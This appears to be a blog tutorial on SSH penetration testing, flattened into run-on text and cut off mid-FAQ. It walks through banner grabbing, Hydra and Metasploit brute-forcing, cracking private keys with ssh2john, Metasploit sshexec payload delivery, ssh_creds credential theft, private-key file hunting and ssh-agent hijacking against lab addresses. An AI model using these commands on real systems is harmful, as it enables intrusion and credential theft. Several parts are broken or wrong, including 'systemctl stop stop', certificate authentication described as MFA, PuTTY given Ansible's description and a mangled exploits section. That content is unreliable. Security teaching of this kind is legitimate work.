Welcome to our comprehensive guide on SSH Penetration Testing. In this blog post, we will delve into the technical aspects of SSH Pentesting, providing you with valuable insights and strategies to ensure the security of your systems. Let's get started with this in-depth exploration of SSH Penetration Testing.Welcome, today I am writing about SSH Penetration Testing fundamentals describing port 22 vulnerabilities. SSH security is one of the topics we all need to understand, remote access services can be an entry point for malicious actors when configured improperly.SSH IntroductionManaging SSH ServiceSSH Interesting FilesSSH Authentication TypesSSH Hacking Tools1. SSH EnumerationSSH Banner GrabberSSH Servers ListDetect SSH Authentication TypeDetect remote users2. SSH ExploitationBruteforce SSH ServiceCrack SSH Private KeysDefault CredentialsSSH Bad KeysSSH ExploitsSSH and ShellShockOpenssh 8.2 p1 exploit3. SSH Post Exploitation - Pentest SSHSSH PersistenceSSH Lateral MovementSearch SSH Key filesSearch SSH Key files inside file contentSSH HijackingF.A.QWhat is SSH Penetration Testing?What are the standard SSH Penetration Testing techniques?What is the purpose of SSH Penetration Testing?Can SSH Penetration Testing be performed without permission?What should be done after SSH Penetration Testing?How do I test my SSH connection?Is SSH port vulnerable?What is the vulnerability of port 22?SSH IntroductionUnderstanding how SSH works is out of scope, Here I assume you are already familiar with the service and how can be configured on a Linux host.Some things to remember, SSH works on port 22 by default and uses a client-server architecture, which is used to access remote hosts securely.SSH Penetration Testing FundamentalsSSH can implement different types of authentication each one of them has its security vulnerabilities, keep that in mind! One of the most used methods to authenticate is using RSA Keys using the PKI infrastructure. Another great feature is the possibility to create encrypted tunnels between machines or implement port forwarding on local or remote services, or as a pentester, we can use it to pivot inside the network under the radar since SSH is a well-known tool by sysadmins.Managing SSH ServiceVerify SSH Server Statussystemctl status sshStart SSH Servicesystemctl start sshStop SSH Servicesystemctl stop stopRestart SSH Servicesystemctl restart stopDefine SSH server to start on bootsystemctl enable sshSSH Interesting FilesWhen performing SSH penetration testing, several interesting files may contain sensitive information and can be targeted by an attacker.Client ConfigSSH client configuration file can be used to automate configurations or jump between machines, take some time and check the file:vi /etc/ssh/ssh_configServer ConfigThis file contains the configuration settings for the SSH daemon, which can be targeted for configuration-based attacks.vi /etc/ssh/sshd_configRecommendation: Active tunnel settings and agent relay, help you with lateral movement.Authorized KeysThis file contains the public keys that are authorized to access a user's account, which can be targeted by an attacker to gain unauthorized access.vi /etc/ssh/authorized_keysKnown Hostscat /home/rfs/.ssh/known_hostsRSA Keys Default folder containing cd ~/.sshcd /home/rfs/.sshSSH Authentication TypesAuthentication TypeDescriptionPassword AuthenticationUsers enter a password to authenticate. This is the most common method but may pose security risks if weak passwords are used.Public Key AuthenticationUses a pair of cryptographic keys, a public key, and a private key. The public key is stored on the server, and the private key is kept securely on the client. Offers strong security and is less susceptible to brute-force attacks.Keyboard-Interactive AuthenticationAllows for a more interactive authentication process, including methods like challenge-response. Often used for multi-factor authentication (MFA) where users need to respond to dynamic challenges.Host-Based AuthenticationAuthenticates based on the host system rather than individual users. It relies on the client system's host key and the server's configuration. This method is less secure and not widely recommended.Certificate-Based AuthenticationInvolves using two or more authentication methods, such as a combination of passwords, biometric data, or a security token. Provides an extra layer of security to ensure the authenticity of the user.Multi-Factor Authentication (MFA)Involves using two or more authentication methods, such as a combination of password, biometric data, or a security token. Provides an extra layer of security to ensure the authenticity of the user.SSH Authentication TypesOk, let's talk about how to pentest SSH, As you know it all starts with enumeration we can use some tools to do all the work for us or we can do it manually.Some questions to ask before starting to enumerate- Is there any SSH server running?- On what Port?- What version is running?- Any Exploit to that version?- What authentication type is used? Passwords / RSA Keys- It is blocking brute force?After we have all the answers we can start thinking about what to do, If don't have any information about users or passwords/keys yet is better to search for an exploit, unfortunately, SSH exploits are rare, Search my website if there are any exploits.Damn it, we are stuck :/ It's time to go enumerate other services and try to find something that can be used like usernames or RSA Keys, remember Keys usually have the username at the bottom.Assuming we found one or more usernames we can try to brute force the service using a good wordlist or if we were lucky and have found an RSA Key with a username, We Are In! Haha is not so easy, but OK, we are learning...SSH Hacking ToolsTool NameDescriptionUsageHydraPassword cracking tool for various protocols, including SSHBrute-force attacks on SSH passwordsNmapNetwork scanning tool that can identify open SSH portsUsed for reconnaissance on target systemsMetasploitFramework with various modules, including those for SSH exploitationExploiting vulnerabilities in SSH servicesJohn the RipperPassword cracking tool for various password hashesUsed to crack SSH password hashesWiresharkNetwork protocol analyzerCaptures and analyzes SSH trafficSSHDumpSniffing tool for capturing SSH trafficMonitors and captures SSH packetsSSH Hacking tools1. SSH EnumerationDuring the enumeration process, cybersecurity professionals seek to gather details such as active SSH hosts, supported algorithms, version information, and user accounts. This information becomes instrumental in performing a thorough security analysis, enabling practitioners to identify potential weaknesses and implement necessary measures to fortify the SSH implementation against unauthorized access and exploitation.After we scan a network and identify port 22 open on a remote host we need to identify what SSH service is running and what version, we can use Nmap.nmap -sV -p22 192.168.1.96SSH Banner GrabberBanner grabbing is an easy technique to do but can help us a lot, we can verify what service version is running on the remote server and try to find a CVE related to it.Banner grabbing can be useful for several reasons, including:- Identifying the version and type of SSH server: This information can be used to determine if the SSH server is vulnerable to known exploits or if there are any known security issues with the version of the software being used.- Checking for compliance with organizational security policies: Administrators may want to ensure that all SSH servers in their organization are configured to display a standard banner message that includes specific information.- Verifying the authenticity of an SSH server: Banner messages can be used to verify that the SSH server being accessed is the intended one, rather than a fake or rogue server.Several tools can be used for SSH banner grabbing, such as Nmap, Netcat, and SSH-Banner. These tools connect to an SSH server and retrieve the banner message. The retrieved banner can then be analyzed to determine the information that is being displayed. nc 192.168.1.96 22If we try to connect using the verbose parameter we can check all the information necessary to authenticate on the remote server.ssh -v 192.168.1.96SSH Servers ListSSH ServerDescriptionURLOpenSSHOpen-source SSH server widely used in Unix-like operating systemsOpenSSHDropbearLightweight and efficient SSH server primarily designed for embedded systemsDropbearBitvise SSH ServerSSH server for Windows with additional features like remote administrationBitviseTectia SSH ServerCommercial SSH server solution by SSH Communications SecurityTectiaProFTPD with mod_sftpFTP server with SFTP support using mod_sftpProFTPDSSH Servers ListDetect SSH Authentication TypeTo detect the SSH authentication type being used to access a system, you can examine the system logs. The authentication type will be logged when a user authenticates to the system via SSH.Here's how you can check the SSH authentication type on a Linux system:- Open the system log file at /var/log/auth.log using your preferred text editor.- Search for the line that contains the user login information you want to check.- Look for the "Accepted" keyword in the line, which indicates that the authentication was successful.ssh -v 192.168.1.96SSH authentication typesDetect remote usersmsfconsolemsf> use auxiliary/scanner/ssh/ssh_enumusers2. SSH ExploitationAt this point, we only know what service is running on port 22 and what version it has (OpenSSH_4.7p1 Debian-8ubuntu1), assuming we have found the username msfadmin we will try to brute-force his password using hydra.Bruteforce SSH Servicehydra -l msfadmin -P rockyou.txt ssh://192.168.1.96crackmapexec ssh -U user -P passwd.lst 192.168.1.96use auxiliary/scanner/ssh/ssh_loginset rhosts 192.168.1.96set user_file user.txtset pass_file password.txtrunCrack SSH Private Keysssh2john id_rsa.priv hash.txtjohn hash.txt --wordlist=/usr/share/wordlists/rockyou.txthttps://github.com/openwall/john/blob/bleeding-jumbo/run/ssh2john.pyDefault Credentialshttps://github.com/PopLabSec/SSH-default-CredentialsSSH Bad KeysSome embedded devices have static SSH keys, you can find a collection of keys here:https://github.com/poplabdev/ssh-badkeysSSH ExploitsVersionExploitOpenSSH set session 1msf post(sshkey_persistence) >exploitSSH User Code Executionmsf > use exploit/multi/ssh/sshexecmsf exploit(sshexec) >set rhosts 192.168.1.103msf exploit(sshexec) >set username rfsmsf exploit(sshexec) >set password poplabsecmsf exploit(sshexec) >set srvhost 192.168.1.107msf exploit(sshexec) >exploitSSH Lateral MovementLateral movement aims to extend an attacker's reach, enabling them to traverse laterally across a network, escalating privileges and accessing sensitive resources.Read more about Pivoting using SSHSteal SSH credentialsIf we have a meterpreter shell we can use the post-exploitation module post/multi/gather/ssh_creds and try to collect all SSH credentials on the machine.use post/multi/gather/ssh_credsmsf post(ssh_creds) > set session 1msf post(ssh_creds) > exploitSearch SSH Key filesfind / -name *id_rsa* 2>/dev/nullSearch SSH Key files inside file contentfind / -name *id_rsa* 2>/dev/nullSSH HijackingFind the SSHd processps uax|grep sshd# Attacker looks for the SSH_AUTH_SOCK on victim's environment variablesgrep SSH_AUTH_SOCK /proc//environAttacker hijack's victim's ssh-agent socketSSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXX/agent.XXXX ssh-add -lAn attacker can log in to remote systems as the victimssh 192.168.1.107 -l victimSSH TunnelsSSH tunnels serve as a powerful and secure mechanism for establishing encrypted communication channels within computer networks. Operating on the foundation of the Secure Shell (SSH) protocol, SSH tunnels create a secure conduit for data transfer and communication between local and remote systems.Tunnel TypeDescriptionUse CaseLocal Port ForwardingForwards traffic from a local port to a remote destination through the SSH serverSecurely access services on a remote server from the local machineRemote Port ForwardingForwards traffic from a remote port to a local destination through the SSH serverExpose a local service to a remote server securelyDynamic Port ForwardingCreates a dynamic SOCKS proxy on the local machine, allowing multiple connections to pass through the SSH tunnelBrowsing the internet securely and anonymously through the SSH tunnelX11 ForwardingEnables secure forwarding of graphical applications from a remote server to the local machineRunning graphical applications on a remote server and displaying them locallyTunneling for File TransferFacilitates secure file transfer by tunneling FTP or other protocols through the SSH connectionSecurely transfer files between systems using non-secure protocolsSSH LogsTo view SSH-related logs, you can use the grep command to filter out SSH entries. grep sshd /var/log/auth.logOr for systems using cat var/log/securegrep sshd /var/log/secureWorking with RSA KeysList of Tools that use SSHTool NameDescriptionSCP (Secure Copy)Command-line tool for securely copying files between local and remote systems using SSHSFTP (Secure FTP)File transfer protocol that operates over SSH, providing secure file access, transfer, and managementrsyncUtility for efficiently syncing files and directories between systems, often used with SSH for secure synchronizationGitDistributed version control system, supports SSH for secure repository access and managementAnsibleAutomation tool for configuration management and application deployment, uses SSH for communication with remote hostsPuTTYAutomation tool for configuration management and application deployment uses SSH for communication with remote hostsWinSCPWindows-based open-source SFTP, FTP, WebDAV, and SCP client for secure file transferCyberduckLibre and open-source client for FTP, SFTP, WebDAV, Amazon S3, and more, with SSH supportMobaXtermEnhanced terminal for Windows with X11 server, tabbed SSH client, and various network toolsTerminus (formerly Pantheon Terminus)Windows-based terminal emulator supports SSH for secure remote access to Unix-like systemsFTP Penetration TestingRDP Penetration TestingSMB Penetration TestingPostgreSQL Penetration TestingF.A.QWhat is SSH Penetration Testing?SSH Penetration Testing is the process of testing and identifying vulnerabilities in the Secure Shell (SSH) protocol implementation, configuration, and access control. It involves various attacks to determine if a system is vulnerable to unauthorized access, data theft, or system compromise.What are the standard SSH Penetration Testing techniques?Common SSH Penetration Testing techniques include password guessing, SSH banner grabbing, protocol fuzzing, denial of service (DoS) attacks, man-in-the-middle (MITM) attacks, key-based authentication, and configuration errors.What is the purpose of SSH Penetration Testing?The purpose of SSH Penetration Testing is to identify security weaknesses in the SSH protocol implementation, configuration, and access control, and to help organizations improve their security posture by addressing identified vulnerabilities.Can SSH Penetration Testing be performed without permission?No, SSH Penetration Testing should not be performed without proper authorization. Unauthorized penetration testing is illegal and can lead to serious legal consequences.What should be done after SSH Penetration Testing?After
